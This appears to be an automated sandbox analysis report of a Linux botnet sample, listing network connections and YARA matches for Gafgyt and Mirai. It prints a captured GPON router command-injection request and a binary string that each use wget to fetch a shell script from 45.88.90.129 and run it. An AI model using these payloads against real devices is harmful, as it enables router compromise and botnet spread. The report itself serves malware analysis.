Source: unknown Network traffic detected: HTTP traffic on port 53766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42536 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58206 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50360
Source: unknown Network traffic detected: HTTP traffic on port 54788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59170
Source: unknown Network traffic detected: HTTP traffic on port 46594 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47136
Source: unknown Network traffic detected: HTTP traffic on port 36936 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47134
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54726
Source: unknown Network traffic detected: HTTP traffic on port 45580 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49570 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46286
Source: unknown Network traffic detected: HTTP traffic on port 34398 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 46284
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48460
Source: unknown Network traffic detected: HTTP traffic on port 55918 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 52194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56902
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36486
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51698
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39514
Source: unknown Network traffic detected: HTTP traffic on port 52212 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39504
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60164
Source: unknown Network traffic detected: HTTP traffic on port 40268 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60162
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59184
Source: unknown Network traffic detected: HTTP traffic on port 39714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40972
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48458
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59180
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40570
Source: unknown Network traffic detected: HTTP traffic on port 34292 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48054
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50770
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39102
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51622
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39588
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59108
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50774
Source: unknown Network traffic detected: HTTP traffic on port 54838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48150 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 58268
Source: unknown Network traffic detected: HTTP traffic on port 47838 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60184 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42748
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56086
Source: unknown Network traffic detected: HTTP traffic on port 49298 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58766 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49942 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56556 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42740
Source: unknown Network traffic detected: HTTP traffic on port 40886 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52968
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53814
Source: unknown Network traffic detected: HTTP traffic on port 55616 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50306
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41890
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36060
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47198
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36062
Source: unknown Network traffic detected: HTTP traffic on port 57194 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49374
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60590
Source: unknown Network traffic detected: HTTP traffic on port 39526 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50702 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53966 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39576
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49370
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 59118
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50784
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50786
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52962
Source: unknown Network traffic detected: HTTP traffic on port 49418 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 45592 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41888
Source: unknown Network traffic detected: HTTP traffic on port 44246 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43488 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56092
Source: unknown Network traffic detected: HTTP traffic on port 60210 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35422 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42730
Source: unknown Network traffic detected: HTTP traffic on port 39758 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59588 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 43186 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47188
Source: unknown Network traffic detected: HTTP traffic on port 35340 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36060 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39562
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47182
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32920
Source: unknown Network traffic detected: HTTP traffic on port 55116 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50794
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 47180
Source: unknown Network traffic detected: HTTP traffic on port 60336 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50312
Source: unknown Network traffic detected: HTTP traffic on port 59764 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55546 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60594
Source: unknown Network traffic detected: HTTP traffic on port 57182 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42726
Source: unknown Network traffic detected: HTTP traffic on port 45712 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57650 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40540
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41874
Source: unknown Network traffic detected: HTTP traffic on port 33584 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 39514 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35270 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 48288 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57788 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41980 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52506
Source: unknown Network traffic detected: HTTP traffic on port 54430 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55452 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 41714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37374
Source: unknown Network traffic detected: HTTP traffic on port 58836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 39554
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 37378
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38224
Source: unknown Network traffic detected: HTTP traffic on port 42478 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51652
Source: unknown Network traffic detected: HTTP traffic on port 34038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 54056 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 36048
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38226
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38218
Source: unknown Network traffic detected: HTTP traffic on port 60512 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37594 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40530
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40534
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60128
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 48018
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53328
Source: unknown Network traffic detected: HTTP traffic on port 40174 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 56838
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38174
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 55986
Source: unknown Network traffic detected: HTTP traffic on port 32804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 50298
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 33710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54656
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32870
Source: unknown Network traffic detected: HTTP traffic on port 56348 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46374 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53896 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41338
Source: unknown Network traffic detected: HTTP traffic on port 42172 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52480
Source: unknown Network traffic detected: HTTP traffic on port 53598 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34952 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49640 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 42904 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52008
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49298
Source: unknown Network traffic detected: HTTP traffic on port 38122 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50652 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53332
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35876 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32852
Source: unknown Network traffic detected: HTTP traffic on port 53254 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60030 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 58002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56486 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 44880 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 50502 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 34538 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57706
Source: unknown Network traffic detected: HTTP traffic on port 37038 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32846
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38152
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54676
Source: unknown Network traffic detected: HTTP traffic on port 56498 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57702
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54674
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 32842
Source: unknown Network traffic detected: HTTP traffic on port 48350 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 35132 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 59466 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40724 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 54678
Source: unknown Network traffic detected: HTTP traffic on port 39940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44826
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53352
Source: unknown Network traffic detected: HTTP traffic on port 41890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44828
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41798
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42646
Source: unknown Network traffic detected: HTTP traffic on port 43624 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46934 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 55148 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40460
Source: unknown Network traffic detected: HTTP traffic on port 34940 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 53356
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49272
Source: unknown Network traffic detected: HTTP traffic on port 34390 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 57996 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 38146
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 57716
Source: unknown Network traffic detected: HTTP traffic on port 47494 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 44818
Source: unknown Network traffic detected: HTTP traffic on port 38318 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 53746 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 41306
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 40452
Source: unknown Network traffic detected: HTTP traffic on port 38994 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 51532 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 40608 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 37930 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 42630
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 43560
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 45740
Source: unknown Network traffic detected: HTTP traffic on port 36960 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 36284 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 46226 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 56152 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 60892 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 60062
Source: unknown Network traffic detected: HTTP traffic on port 39836 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 51584
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 35936
Source: unknown TCP traffic detected without corresponding DNS query: 45.88.90.129
Source: unknown TCP traffic detected without corresponding DNS query: 170.87.128.139
Source: unknown TCP traffic detected without corresponding DNS query: 170.243.5.139
Source: unknown TCP traffic detected without corresponding DNS query: 170.168.195.139
Source: unknown TCP traffic detected without corresponding DNS query: 170.50.207.175
Source: unknown TCP traffic detected without corresponding DNS query: 170.119.129.240
Source: unknown TCP traffic detected without corresponding DNS query: 170.125.16.28
Source: unknown TCP traffic detected without corresponding DNS query: 170.223.246.139
Source: unknown TCP traffic detected without corresponding DNS query: 170.50.193.150
Source: unknown TCP traffic detected without corresponding DNS query: 170.180.193.43
Source: unknown TCP traffic detected without corresponding DNS query: 170.94.62.119
Source: unknown TCP traffic detected without corresponding DNS query: 170.222.133.224
Source: unknown TCP traffic detected without corresponding DNS query: 170.120.38.241
Source: unknown TCP traffic detected without corresponding DNS query: 170.147.101.86
Source: unknown TCP traffic detected without corresponding DNS query: 170.220.239.139
Source: unknown TCP traffic detected without corresponding DNS query: 170.69.73.25
Source: unknown TCP traffic detected without corresponding DNS query: 170.164.15.201
Source: unknown TCP traffic detected without corresponding DNS query: 170.235.202.98
Source: unknown TCP traffic detected without corresponding DNS query: 170.132.36.210
Source: unknown TCP traffic detected without corresponding DNS query: 170.175.126.226
Source: unknown TCP traffic detected without corresponding DNS query: 170.43.173.63
Source: unknown TCP traffic detected without corresponding DNS query: 170.227.21.65
Source: unknown TCP traffic detected without corresponding DNS query: 170.5.136.29
Source: unknown TCP traffic detected without corresponding DNS query: 170.193.216.156
Source: unknown TCP traffic detected without corresponding DNS query: 170.102.201.207
Source: unknown TCP traffic detected without corresponding DNS query: 170.121.94.18
Source: unknown TCP traffic detected without corresponding DNS query: 170.128.105.181
Source: unknown TCP traffic detected without corresponding DNS query: 170.35.111.141
Source: unknown TCP traffic detected without corresponding DNS query: 170.17.112.203
Source: unknown TCP traffic detected without corresponding DNS query: 170.112.142.179
Source: unknown TCP traffic detected without corresponding DNS query: 170.137.222.211
Source: unknown TCP traffic detected without corresponding DNS query: 170.135.21.31
Source: unknown TCP traffic detected without corresponding DNS query: 170.232.98.195
Source: unknown TCP traffic detected without corresponding DNS query: 170.15.243.72
Source: unknown TCP traffic detected without corresponding DNS query: 170.57.245.236
Source: unknown TCP traffic detected without corresponding DNS query: 170.214.66.131
Source: unknown TCP traffic detected without corresponding DNS query: 170.206.121.233
Source: unknown TCP traffic detected without corresponding DNS query: 170.49.93.207
Source: unknown TCP traffic detected without corresponding DNS query: 170.21.237.86
Source: unknown TCP traffic detected without corresponding DNS query: 170.142.154.204
Source: unknown TCP traffic detected without corresponding DNS query: 170.176.170.182
Source: unknown TCP traffic detected without corresponding DNS query: 170.175.235.37
Source: unknown TCP traffic detected without corresponding DNS query: 170.233.124.205
Source: unknown TCP traffic detected without corresponding DNS query: 170.3.220.82
Source: unknown TCP traffic detected without corresponding DNS query: 170.169.65.218
Source: unknown TCP traffic detected without corresponding DNS query: 170.192.4.213
Source: unknown TCP traffic detected without corresponding DNS query: 170.6.153.28
Source: unknown TCP traffic detected without corresponding DNS query: 170.182.116.60
Source: unknown TCP traffic detected without corresponding DNS query: 170.21.198.2
Source: unknown TCP traffic detected without corresponding DNS query: 170.82.149.81
Source: WU3D24p3h0.elf String found in binary or memory: http://45.88.90.129/bins/Rakitin.mips%20-O%20-%3E%20/tmp/jno;sh%20/tmp/jno%27/&sessionKey=1039230114
Source: WU3D24p3h0.elf String found in binary or memory: http://45.88.90.129/bins/Rakitin.sh
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?style/ HTTP/1.1User-Agent: Hello, WorldAccept: */*Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 34 35 2e 38 38 2e 39 30 2e 31 32 39 2f 62 69 6e 73 2f 52 61 6b 69 74 69 6e 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 67 61 66 3b 73 68 2b 2f 74 6d 70 2f 67 61 66 60 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://45.88.90.129/bins/Rakitin.sh+-O+/tmp/gaf;sh+/tmp/gaf`&ipv=0

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: WU3D24p3h0.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: WU3D24p3h0.elf, type: SAMPLE Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6210.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6210.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6214.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6214.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 6208.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: 6208.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: Process Memory Space: WU3D24p3h0.elf PID: 6208, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: WU3D24p3h0.elf PID: 6210, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Source: Process Memory Space: WU3D24p3h0.elf PID: 6214, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 Author: unknown
Yara signature match
Source: WU3D24p3h0.elf, type: SAMPLE Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: WU3D24p3h0.elf, type: SAMPLE Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6210.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6210.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6214.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6214.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: 6208.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: 6208.1.00007fe884011000.00007fe884028000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, hash5 = 420bf9215dfb04e5008c5e522eee9946599e2b323b17f17919cd802ebb012175, hash4 = 2efa09c124f277be2199bee58f49fc0ce6c64c0bef30079dfb3d94a6de492a69, hash3 = 20683ff7a5fec1237fc09224af40be029b9548c62c693844624089af568c89d4, hash2 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, hash1 = 05c78c3052b390435e53a87e3d31e9fb17f7c76bb4df2814313bca24735ce81c, author = Florian Roth, description = Detects Mirai Botnet Malware, hash10 = c61bf95146c68bfbbe01d7695337ed0e93ea759f59f651799f07eecdb339f83f, hash11 = d9573c3850e2ae35f371dff977fc3e5282a5e67db8e3274fd7818e8273fd5c89, hash12 = f1100c84abff05e0501e77781160d9815628e7fd2de9e53f5454dbcac7c84ca5, hash9 = bf0471b37dba7939524a30d7d5afc8fcfb8d4a7c9954343196737e72ea4e2dc4, hash8 = 89570ae59462e6472b6769545a999bde8457e47ae0d385caaa3499ab735b8147, hash7 = 70bb0ec35dd9afcfd52ec4e1d920e7045dc51dca0573cd4c753987c9d79405c0, hash6 = 62cdc8b7fffbaf5683a466f6503c03e68a15413a90f6afd5a13ba027631460c6, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, hash13 = fb713ccf839362bf0fbe01aedd6796f4d74521b133011b408e42c1fd9ab8246b
Source: Process Memory Space: WU3D24p3h0.elf PID: 6208, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
Source: Process Memory Space: WU3D24p3h0.elf PID: 6210, type: MEMORYSTR Matched rule: Linux_Trojan_Gafgyt_ea92cca8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = aa4aee9f3d6bedd8234eaf8778895a0f5d71c42b21f2a428f01f121e85704e8e, id = ea92cca8-bba7-4a1c-9b88-a2d051ad0021, last_modified = 2021-09-16
